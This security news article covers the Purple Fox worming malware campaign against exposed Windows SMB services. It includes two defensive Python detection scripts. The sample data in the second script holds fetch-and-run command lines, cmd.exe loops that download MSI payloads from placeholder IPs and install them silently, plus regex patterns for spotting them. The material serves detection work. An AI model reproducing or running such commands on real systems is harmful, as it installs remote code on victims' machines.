
Brute-Force Campaign on Windows SMBs Spreads Worming Malware

Hackers are performing brute-force attacks on vulnerable, internet-facing Windows SMBs to deliver Purple Fox malware. The variant has been updated with worming capabilities.

Internet-facing Windows devices are being targeted by an active malware campaign known as Purple Fox. Hackers are leveraging brute-force attempts against SMBs to deploy the malware, which has worming capabilities, according to a Tuesday report from Guardicore.

Guardicore has detected a steady increase in malicious activity around Purple Fox since the researchers began tracking it in May 2020. During that time, there has been a 600 percent increase, or about 90,000 observed attacks.

First discovered in March 2018, Purple Fox was previously deployed as an exploit kit that targeted Internet Explorer and Windows devices through a variety of privilege escalation exploits.

The earlier campaigns required interaction from the user or a third-party tool to deploy Purple Fox. But Guardicore researchers stressed that the latest campaign, launched at the end of 2020, shows the hackers behind the malware have boosted their deployment techniques.

Purple Fox is now able to spread through indiscriminate port scanning and active exploitation of exposed SMB services, such as those with weak hashes or passwords.
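The entry vector described above is password guessing against SMB services reachable from the internet. On the target side that shows up in the Windows Security log as bursts of failed network logons (event 4625, logon type 3) from one source. The script below is an added example, not code from the report or from Guardicore: it runs a sliding-window count over a constructed sample of such events (the IPs, usernames and timestamps are invented) and flags sources whose failure rate exceeds a threshold, reporting how many distinct accounts each source tried so that a single-account brute force can be told apart from a password spray.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security log events, not data from the report.
# Event 4625 is a failed logon; logon type 3 is a network logon, which is what
# an SMB authentication attempt against an exposed share produces.
SAMPLE_EVENTS = [
    # One source hammering the built-in administrator account: 8 failures in 25 s
    *[{"time": f"2021-03-23T10:00:{s:02d}", "event_id": 4625, "logon_type": 3,
       "src_ip": "203.0.113.7", "user": "administrator"}
      for s in (1, 3, 5, 8, 11, 14, 20, 25)],
    # A user mistyping a password twice, then logging on successfully (4624)
    {"time": "2021-03-23T10:05:00", "event_id": 4625, "logon_type": 3,
     "src_ip": "198.51.100.20", "user": "jsmith"},
    {"time": "2021-03-23T10:05:30", "event_id": 4625, "logon_type": 3,
     "src_ip": "198.51.100.20", "user": "jsmith"},
    {"time": "2021-03-23T10:06:00", "event_id": 4624, "logon_type": 3,
     "src_ip": "198.51.100.20", "user": "jsmith"},
    # A low-and-slow source: 6 failures spread over 2.5 hours
    *[{"time": f"2021-03-23T{h:02d}:{m:02d}:00", "event_id": 4625, "logon_type": 3,
       "src_ip": "192.0.2.5", "user": "backup"}
      for h, m in ((9, 0), (9, 30), (10, 0), (10, 30), (11, 0), (11, 30))],
]


def detect_smb_bruteforce(events, threshold=5, window_seconds=300):
    """Flag source IPs with at least `threshold` failed network logons inside any
    interval of `window_seconds`. Returns {src_ip: {"max_failures_in_window": int,
    "distinct_users": int}} so the caller can tell a single-account brute force
    (many failures, one user) from a password spray (many users)."""
    window = timedelta(seconds=window_seconds)
    by_src = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4625 and ev["logon_type"] == 3:
            by_src[ev["src_ip"]].append((datetime.fromisoformat(ev["time"]), ev["user"]))

    alerts = {}
    for src, attempts in by_src.items():
        attempts.sort()
        start = 0
        peak = 0
        # Sliding window over the time-ordered failures from this source
        for end, (t_end, _) in enumerate(attempts):
            while t_end - attempts[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[src] = {
                "max_failures_in_window": peak,
                "distinct_users": len({user for _, user in attempts}),
            }
    return alerts


if __name__ == "__main__":
    for src, info in detect_smb_bruteforce(SAMPLE_EVENTS).items():
        print(f"{src}: {info['max_failures_in_window']} failures in 5 min "
              f"against {info['distinct_users']} account(s)")
```

With the defaults only the fast source is flagged; widening the window to an hour and lowering the threshold also catches the low-and-slow source, which is the trade-off a detection engineer tunes against the normal failure rate of the environment. Whatever the thresholds, the cheaper control is the one the report implies: do not expose SMB to the internet at all.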

“While it appears that the functionality of Purple Fox hasn’t changed much post exploitation, its spreading and distribution methods – and its worm-like behavior – are much different than described in previous [reports],” researchers wrote.

“We’ve observed an infrastructure that appears to be made out of a hodge-podge of vulnerable and exploited servers hosting the initial payload of the malware, infected machines which are serving as nodes of those constantly worming campaigns, and server infrastructure that appears to be related to other malware campaigns,” they added.

Specifically, researchers detected the hackers hosting various MSI packages on 2,000 servers that appear to be compromised machines they’ve repurposed for hosting malicious payloads.

It also appears that the vast majority of these servers are running relatively old versions of Windows Server with IIS version 7.5 and Microsoft FTP, both known to have multiple severe vulnerabilities. The hackers are using these servers to deliver the initial payload.

About 52 percent of the observed servers used for service distribution are Microsoft Windows RPC, followed by Microsoft Terminal Service (16.5 percent) and Microsoft IIS httpd 7.5 (15.9 percent).

Guardicore was also able to assess how the hackers are spreading this campaign. The worm payload is executed after the compromise of a victim’s machine via an exposed, vulnerable service. The worm payload is also sent via a phishing campaign that exploits a browser vulnerability.

The hackers are leveraging multiple sample types to deploy the malware. After the virus deploys, it creates a new service able to establish persistence on the device and execute a simple command “for loop,” the purpose of which is to iterate across a number of URLs that contain the MSI that installs the final Purple Fox payload.

Once the package is executed, the MSI installer launches.

“The installer pretends to be a Windows Update package along with Chinese text which roughly translates to ‘Windows Update’ and random letters,” researchers explained. “These letters are randomly generated between each different MSI installer to create a different hash and make it a bit difficult to tie between different versions of the same MSI.” 

“This is a ‘cheap’ and simple way of evading various detection methods such as static signatures,” they continued. “We have [also] identified MSI packages with the same strings but with random null bytes appended to them in order to create different hashes of the same file.”

The installer then extracts the payloads from the MSI package and decrypts them. Of particular concern, the malware is able to modify the Windows firewall: it adds a new policy that creates a filter blocking vulnerable, internet-facing ports from connecting to the infected device.

Guardicore believes that the attackers are using this to prevent the machine from being reinfected, or to prevent another attacker from exploiting the same device. Enterprises should review the provided indicators of compromise to assess their systems' security.
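The post-compromise behaviour described above (a new service whose command is a for loop over URLs serving the MSI, followed by a firewall filter that blocks inbound ports) is visible in ordinary host telemetry, which makes it a useful hunting pattern alongside the published IoCs. The script below is an added example, not code from the report or from Guardicore: it correlates service-install and firewall-rule events per host over a constructed sample. The event shapes are a simplification of the System log's "service installed" entry (event 7045) and the Windows Firewall "rule added" log entry; the field names, hostnames, service and rule names, ports and URLs are all invented for illustration, and the use of msiexec in the sample command line is an assumption about how such a loop would install the package.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample host events, not data from the report. The shapes are a
# simplification of System log 7045 (a service was installed) and the Windows
# Firewall "rule added" log entry; field names are my own.
SAMPLE_EVENTS = [
    # Infected host: a service whose command is a cmd.exe for-loop over MSI URLs,
    # followed seconds later by an inbound block rule on SMB-related ports
    {"time": "2021-03-23T10:01:10", "host": "ws-finance-07", "kind": "service_installed",
     "service": "wupdsvc",
     "image_path": "cmd.exe /c for %i in (http://203.0.113.45/a.msi http://198.51.100.9/b.msi) "
                   "do msiexec /i %i /q"},
    {"time": "2021-03-23T10:01:15", "host": "ws-finance-07", "kind": "firewall_rule_added",
     "rule": "Block_445", "action": "Block", "direction": "In", "local_ports": "445,139,135"},
    # Benign host: a real service install plus an allow rule for its own port
    {"time": "2021-03-23T11:20:00", "host": "ws-hr-02", "kind": "service_installed",
     "service": "BackupAgent", "image_path": r"C:\Program Files\Backup\agent.exe"},
    {"time": "2021-03-23T11:25:00", "host": "ws-hr-02", "kind": "firewall_rule_added",
     "rule": "Allow Backup", "action": "Allow", "direction": "In", "local_ports": "8443"},
    # Partial match: suspicious service but no firewall change seen (yet)
    {"time": "2021-03-23T12:00:00", "host": "srv-iis-01", "kind": "service_installed",
     "service": "svchost32",
     "image_path": "cmd.exe /c for %u in (http://203.0.113.45/c.msi) do msiexec /i %u /q"},
]

URL_RE = re.compile(r"https?://\S+\.msi", re.IGNORECASE)
LOOP_RE = re.compile(r"\bfor\b.*\bdo\b", re.IGNORECASE)


def suspicious_service(ev):
    """A service binary path that is itself a shell loop fetching .msi URLs."""
    path = ev["image_path"]
    return bool(LOOP_RE.search(path)) and bool(URL_RE.search(path))


def blocking_inbound_rule(ev):
    return ev["action"].lower() == "block" and ev["direction"].lower() == "in"


def correlate(events, window_seconds=600):
    """Per host, pair each suspicious service install with any inbound block rule
    added within `window_seconds`. Both stages together are rated high; the
    service install alone is still worth a look, so it is rated medium."""
    window = timedelta(seconds=window_seconds)
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)

    findings = []
    for host, evs in sorted(by_host.items()):
        fw_rules = [e for e in evs
                    if e["kind"] == "firewall_rule_added" and blocking_inbound_rule(e)]
        for svc in evs:
            if svc["kind"] != "service_installed" or not suspicious_service(svc):
                continue
            t0 = datetime.fromisoformat(svc["time"])
            linked = [r["rule"] for r in fw_rules
                      if abs(datetime.fromisoformat(r["time"]) - t0) <= window]
            findings.append({
                "host": host,
                "service": svc["service"],
                "payload_urls": URL_RE.findall(svc["image_path"]),
                "block_rules": linked,
                "severity": "high" if linked else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']}: service {f['service']} pulls "
              f"{len(f['payload_urls'])} MSI URL(s); block rules: {f['block_rules'] or 'none'}")
```

The URLs extracted from the service command line are the hosts that matter for containment: they are the compromised servers the report describes as repurposed payload hosts, so they belong on an egress blocklist and in a hunt across the rest of the estate. The firewall stage is rated separately on purpose; a block rule on its own is routine administration, and only its pairing with the service loop makes it interesting.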

Purple Fox is the latest malware to tack on worming capabilities. Earlier this month, CERT-FR reported the Ryuk ransomware variant had been updated with worming capabilities that allow it to automatically proliferate across the network of its victims.

Worming capabilities add an extra layer of risk for entities that fail to patch known vulnerabilities or to segment vulnerable devices from the main network. It’s crucial for healthcare organizations, known for patch management struggles, to review the IOCs provided to determine if they’ve been compromised.
